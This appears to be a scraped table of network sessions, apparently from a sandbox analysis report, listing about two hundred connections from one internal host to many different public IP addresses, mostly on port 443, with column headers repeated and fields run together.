                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20551192.168.2.1353200122.40.134.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20552192.168.2.1336110111.217.16.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20553192.168.2.1352932125.121.91.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20554192.168.2.1348548211.70.30.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20555192.168.2.133419468.60.78.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20556192.168.2.1340068109.102.184.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20557192.168.2.1354988216.97.184.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20558192.168.2.134983234.29.237.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20559192.168.2.135914283.60.133.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20560192.168.2.134311889.158.103.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20561192.168.2.1336288203.208.81.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20562192.168.2.1341062143.236.64.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20563192.168.2.134106298.190.79.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20564192.168.2.135065880.71.161.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20565192.168.2.1341676115.88.248.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20566192.168.2.133602079.56.111.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20567192.168.2.1359730132.176.153.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20568192.168.2.134090438.253.7.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20569192.168.2.1353090103.237.211.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20570192.168.2.1351230191.241.135.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20571192.168.2.134670279.95.130.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20572192.168.2.1360730109.218.38.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20573192.168.2.1349850130.62.220.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20574192.168.2.1336472168.225.39.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20575192.168.2.135058457.133.227.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20576192.168.2.1334272113.59.97.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20577192.168.2.1340538223.175.187.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20578192.168.2.1360496193.96.224.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20579192.168.2.133563857.204.22.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20580192.168.2.134191452.147.235.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20581192.168.2.13576988.151.16.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20582192.168.2.1357530130.203.138.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20583192.168.2.1358200126.5.91.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20584192.168.2.1348830209.10.175.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20585192.168.2.134234447.211.65.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20586192.168.2.1348886208.194.164.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20587192.168.2.1352210188.152.48.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20588192.168.2.1343100138.33.32.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20589192.168.2.1357474175.67.79.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20590192.168.2.1345086112.41.38.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20591192.168.2.1336462153.198.126.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20592192.168.2.1356006176.18.252.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20593192.168.2.1339982101.52.40.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20594192.168.2.1334686135.198.76.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20595192.168.2.133788627.8.70.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20596192.168.2.133671434.87.48.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20597192.168.2.133286444.4.137.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20598192.168.2.1332970173.96.127.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20599192.168.2.1337476133.56.120.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20600192.168.2.1342882208.57.63.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20601192.168.2.1348800180.50.86.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20602192.168.2.1352988205.141.45.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20603192.168.2.134491831.222.100.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20604192.168.2.134312693.14.251.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20605192.168.2.134839880.86.189.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20606192.168.2.134274289.54.35.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20607192.168.2.1347682162.149.231.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20608192.168.2.1358762213.217.101.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20609192.168.2.134331685.222.39.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20610192.168.2.1338902199.153.13.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20611192.168.2.134468858.188.176.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20612192.168.2.134287247.190.116.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20613192.168.2.1353404145.60.195.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20614192.168.2.1335398118.90.189.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20615192.168.2.134333059.33.57.140443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20616192.168.2.1351154209.98.157.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20617192.168.2.1358106200.201.7.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20618192.168.2.1346904121.92.217.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20619192.168.2.133292699.38.150.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20620192.168.2.1358136168.180.220.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20621192.168.2.1351426218.63.79.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20622192.168.2.135767861.78.139.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20623192.168.2.1351474145.117.250.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20624192.168.2.1343818121.38.205.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20625192.168.2.134348499.106.78.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20626192.168.2.1343582151.110.243.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20627192.168.2.1335046185.28.211.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20628192.168.2.1356928199.96.87.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20629192.168.2.1358088216.75.71.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20630192.168.2.1352720178.199.112.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20631192.168.2.1341766159.12.119.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20632192.168.2.1337736208.147.16.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20633192.168.2.135197071.224.35.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20634192.168.2.135614287.82.14.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20635192.168.2.1355646172.176.188.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20636192.168.2.1335230104.168.5.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20637192.168.2.1357494124.240.150.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20638192.168.2.1337432221.21.247.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20639192.168.2.1358198130.87.108.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20640192.168.2.1335658153.12.213.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20641192.168.2.13413164.38.59.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20642192.168.2.135934690.225.249.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20643192.168.2.1344826173.8.104.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20644192.168.2.1355660121.209.127.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20645192.168.2.1333780219.52.156.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20646192.168.2.133585889.26.203.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20647192.168.2.1338994163.37.149.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20648192.168.2.135887269.173.186.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20649192.168.2.1346754196.241.115.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20650192.168.2.1339348166.194.219.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20651192.168.2.1347292203.15.185.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20652192.168.2.1358976125.67.120.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20653192.168.2.1345032143.114.246.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20654192.168.2.1355668131.122.109.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20655192.168.2.1341800200.105.199.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20656192.168.2.1355834145.5.98.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20657192.168.2.136079432.221.202.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20658192.168.2.136010214.21.185.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20659192.168.2.1344824193.122.141.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20660192.168.2.1341214173.247.134.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20661192.168.2.134361643.117.46.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20662192.168.2.1343502170.57.49.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20663192.168.2.1342444149.91.95.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20664192.168.2.1342948138.238.40.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20665192.168.2.1342238184.178.209.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20666192.168.2.135061025.2.123.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20667192.168.2.136071893.27.90.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20668192.168.2.135770653.73.143.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20669192.168.2.1358598194.118.217.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20670192.168.2.1359458184.62.109.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20671192.168.2.135827866.194.61.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20672192.168.2.1343874158.74.24.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20673192.168.2.1346812182.177.157.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20674192.168.2.1334970178.196.109.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20675192.168.2.1340500147.21.28.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20676192.168.2.134581853.40.249.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20677192.168.2.1358838151.83.242.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20678192.168.2.1356882106.211.115.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20679192.168.2.1359346213.0.120.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20680192.168.2.133976623.228.84.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20681192.168.2.1345570104.20.59.2048080
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20682192.168.2.133999223.40.31.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20683192.168.2.135793493.158.188.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20684192.168.2.1334366114.159.56.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20685192.168.2.134375639.75.89.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20686192.168.2.133344859.19.128.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20687192.168.2.1360038175.154.171.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20688192.168.2.134297886.65.46.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20689192.168.2.134761224.249.232.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20690192.168.2.1341458178.49.103.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20691192.168.2.1339588169.253.5.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20692192.168.2.1350018216.167.112.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20693192.168.2.134051825.3.142.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20694192.168.2.135845270.204.180.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20695192.168.2.13536448.179.87.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20696192.168.2.1333172219.150.26.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20697192.168.2.134461238.181.127.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20698192.168.2.133463037.255.210.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20699192.168.2.134101259.232.128.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20700192.168.2.1335986140.219.192.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20701192.168.2.135538261.186.30.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20702192.168.2.135054293.1.221.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20703192.168.2.1352270191.96.56.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20704192.168.2.134668636.62.40.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20705192.168.2.134678478.196.136.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20706192.168.2.1344092161.135.17.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20707192.168.2.1347156118.66.26.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20708192.168.2.134285696.176.233.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20709192.168.2.1342280176.189.209.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20710192.168.2.1354160151.202.187.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20711192.168.2.135631098.230.46.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20712192.168.2.1355114159.80.77.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20713192.168.2.1341224102.247.66.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20714192.168.2.136036257.210.56.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20715192.168.2.1360752111.46.135.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20716192.168.2.1335430200.60.22.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20717192.168.2.134663273.102.213.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20718192.168.2.135158434.59.135.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20719192.168.2.133897419.95.234.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20720192.168.2.1346462197.255.45.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20721192.168.2.133300087.253.22.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20722192.168.2.136052679.194.2.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20723192.168.2.1338864153.224.86.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20724192.168.2.135041047.24.68.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20725192.168.2.1348094116.248.240.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20726192.168.2.1345548165.25.236.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20727192.168.2.135941284.176.50.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20728192.168.2.1337700163.192.31.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20729192.168.2.1343326135.60.53.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20730192.168.2.1358158132.254.93.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20731192.168.2.134687281.27.221.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20732192.168.2.135334227.226.146.98443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20733192.168.2.1358266191.66.101.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20734192.168.2.1356816176.246.94.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20735192.168.2.1342438132.169.51.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20736192.168.2.1333682118.239.172.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20737192.168.2.133533291.12.216.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20738192.168.2.1359454115.78.52.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20739192.168.2.1354496190.167.219.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20740192.168.2.1334140193.136.43.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20741192.168.2.135442647.242.13.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20742192.168.2.1352706167.43.85.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20743192.168.2.135894871.131.149.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20744192.168.2.1333604178.54.177.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20745192.168.2.133916870.31.97.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20746192.168.2.134831254.70.174.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20747192.168.2.135000235.49.67.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20748192.168.2.135274858.205.13.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20749192.168.2.1359020138.131.13.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20750192.168.2.1353128190.34.27.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20751192.168.2.135522813.229.183.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20752192.168.2.1334792128.231.192.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20753192.168.2.1354550137.112.54.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20754192.168.2.1355362158.150.51.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20755192.168.2.1349132106.171.137.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20756192.168.2.1344770189.213.147.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20757192.168.2.134886258.203.139.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20758192.168.2.135583465.52.93.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20759192.168.2.1348370169.168.200.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20760192.168.2.1357500197.28.83.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20761192.168.2.1339286218.13.166.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20762192.168.2.133417293.27.226.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20763192.168.2.134197814.243.168.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20764192.168.2.1340064124.47.234.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20765192.168.2.134077246.135.27.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20766192.168.2.134394491.84.105.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20767192.168.2.1342030193.165.17.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20768192.168.2.1359240107.79.25.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20769192.168.2.1339918160.59.165.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20770192.168.2.134329488.47.94.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    20771192.168.2.134226234.137.190.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
